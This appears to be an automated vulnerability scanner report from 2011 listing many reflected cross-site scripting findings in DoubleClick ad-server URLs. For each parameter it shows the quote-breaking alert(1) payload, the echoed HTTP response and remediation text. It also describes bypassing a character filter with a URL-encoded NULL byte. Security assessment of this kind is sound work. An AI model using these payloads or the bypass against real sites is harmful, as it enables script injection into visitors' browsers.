<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 1%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=&613e3"-alert(1)-"21fa9330d9a=1http://www.geico.com/landingpage/go125.htm?soa=59796"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acb04"-alert(1)-"12c860f5038 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6042 Date: Tue, 28 Jun 2011 02:26:41 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 91%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=acb04"-alert(1)-"12c860f5038http://www.geico.com/landingpage/go125.htm?soa=59796"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8931a"-alert(1)-"96fd3dbaeee was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6042 Date: Tue, 28 Jun 2011 02:25:06 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... ://ad.doubleclick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/v%3B239209730%3B0-0%3B0%3B62127291%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=4675506593120912348931a"-alert(1)-"96fd3dbaeee&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go125.htm?soa=59796"); var fscUrl = url; var fscUrlClickTagFound = false; var wmod ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c69f3"-alert(1)-"17b445dd750 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6058 Date: Tue, 28 Jun 2011 02:23:51 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 3Bh%3Dv8/3b34/7/ab/%2a/s%3B239209737%3B0-0%3B0%3B62127587%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488c69f3"-alert(1)-"17b445dd750&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go140.htm?soa=59798"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5f09"-alert(1)-"61479ab10b3 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6058 Date: Tue, 28 Jun 2011 02:23:25 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... lick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/s%3B239209737%3B0-0%3B0%3B62127587%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509a5f09"-alert(1)-"61479ab10b3&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go140.htm?soa=59798"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; ...[SNIP]...
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 575a0"-alert(1)-"2dc14e7726b was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6058 Date: Tue, 28 Jun 2011 02:24:18 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 0%3B62127587%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530575a0"-alert(1)-"2dc14e7726b&redirect=http://www.geico.com/landingpage/go140.htm?soa=59798"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "always";
var o ...[SNIP]...
1.31. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.8 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/N6595.317091.MERKLEINC.COM/B5374569.8
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d96da"-alert(1)-"f7095fb1d0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6070 Date: Tue, 28 Jun 2011 02:25:02 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 7%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=&d96da"-alert(1)-"f7095fb1d0a=1http://www.geico.com/landingpage/go140.htm?soa=59798"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "always";
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efeba"-alert(1)-"38c0b17c448 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6058 Date: Tue, 28 Jun 2011 02:24:39 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 87%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=efeba"-alert(1)-"38c0b17c448http://www.geico.com/landingpage/go140.htm?soa=59798"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "always";
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bba38"-alert(1)-"78ca1578dde was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6058 Date: Tue, 28 Jun 2011 02:23:04 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... ://ad.doubleclick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/s%3B239209737%3B0-0%3B0%3B62127587%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489bba38"-alert(1)-"78ca1578dde&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go140.htm?soa=59798"); var fscUrl = url; var fscUrlClickTagFound = false; var wmod ...[SNIP]...
The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be866'-alert(1)-'87c7a423e2e was submitted in the _a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4593 Date: Tue, 28 Jun 2011 03:10:18 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... pe_300x250.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950be866'-alert(1)-'87c7a423e2e&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6994%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744';
The value of the _c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3760b'-alert(1)-'d2e50412e43 was submitted in the _c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4614 Date: Tue, 28 Jun 2011 03:11:29 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... dth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=172864053760b'-alert(1)-'d2e50412e43&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D7003%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744'; var target = '_blank'; var dcbgco ...[SNIP]...
The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fb80'-alert(1)-'3f118c0b305 was submitted in the _d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4623 Date: Tue, 28 Jun 2011 03:11:06 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=173301083fb80'-alert(1)-'3f118c0b305&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6990%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744'; var target = '_blank' ...[SNIP]...
The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d52cb'-alert(1)-'412f1479ff2 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4602 Date: Tue, 28 Jun 2011 03:09:31 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... n.net/3126678/SLIM_Wipe_Maria_300x250.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956d52cb'-alert(1)-'412f1479ff2&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6972%26avppid%3D653%26avpcid%3D3736%26 ...[SNIP]...
The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db96c'-alert(1)-'befe711ab0a was submitted in the _et parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4614 Date: Tue, 28 Jun 2011 03:09:56 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 5050_KatieMike_300x250.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488db96c'-alert(1)-'befe711ab0a&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D7004%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26 ...[SNIP]...
The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3423'-alert(1)-'c547628938b was submitted in the _o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4614 Date: Tue, 28 Jun 2011 03:09:08 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... s0.2mdn.net/3126678/SLIM_5050_KatieMike_300x250.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944a3423'-alert(1)-'c547628938b&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D7004%26avppid%3D653%26avpcid ...[SNIP]...
The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb5b1'-alert(1)-'8ffdd34280f was submitted in the _pm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4608 Date: Tue, 28 Jun 2011 03:11:51 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... '; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956cb5b1'-alert(1)-'8ffdd34280f&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6954%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744'; var target = '_blank'; var dcbgcolor = '';
The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42fa3'-alert(1)-'a131aad650a was submitted in the _pn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4602 Date: Tue, 28 Jun 2011 03:12:15 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... e = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=1733136542fa3'-alert(1)-'a131aad650a&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6972%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744'; var target = '_blank'; var dcbgcolor = ''; var dcswf = ' ...[SNIP]...
The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f823e'-alert(1)-'1fb1ebda1f6 was submitted in the _s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4614 Date: Tue, 28 Jun 2011 03:10:43 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 0.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683f823e'-alert(1)-'1fb1ebda1f6&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6971%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744'; var targe ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 298a7'-alert(1)-'14caee42673 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4467 Cache-Control: no-cache Pragma: no-cache Date: Tue, 28 Jun 2011 03:12:32 GMT Expires: Tue, 28 Jun 2011 03:12:32 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... e'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=298a7'-alert(1)-'14caee42673http://rts.alldayslim.com/p/fa760703?avpzid=1018&avpmid=6990&avppid=653&avpcid=3736&avpaid=337&sid=744'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2mdn.net/3126678/SLIM_Quiz_Spo ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67ac6'-alert(1)-'f3abb855eac was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4602 Date: Tue, 28 Jun 2011 03:08:49 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... dcgif = 'http://s0.2mdn.net/3126678/SLIM_Wipe_Katie_300x250.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb67ac6'-alert(1)-'f3abb855eac&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D7014%26avppid%3D ...[SNIP]...
The value of the _c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1eaf6"-alert(1)-"1c881d63b74 was submitted in the _c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7535 Date: Tue, 28 Jun 2011 02:09:27 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 0%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=170805091eaf6"-alert(1)-"1c881d63b74&_pm=97956&_pn=17474528&redirect=https%3a%2f%2fquote.allstate.com%3Fquote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000%3B39858194%26%26TFN%3D8664972899%26Campaign%3D222230000010575"); var fscUrl = url; var ...[SNIP]...
The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb3ed"-alert(1)-"c4998f35407 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7500 Date: Tue, 28 Jun 2011 02:06:43 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=eb3ed"-alert(1)-"c4998f35407&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=https%3a%2f%2fquote.allstate.com%3Fquote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000%3B41496831%26%26TFN%3D8664 ...[SNIP]...
The value of the _o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac37f"-alert(1)-"bb4e6cdabfe was submitted in the _o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7515 Date: Tue, 28 Jun 2011 02:06:15 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 81/1%3Bu%3D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=ac37f"-alert(1)-"bb4e6cdabfe&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=https%3a%2f%2fquote.allstate.com%3Fquote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000%3B39858194%26%26 ...[SNIP]...
The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0059830"-alert(1)-"d8f92070b1e was submitted in the _pm parameter. This input was echoed as 59830"-alert(1)-"d8f92070b1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
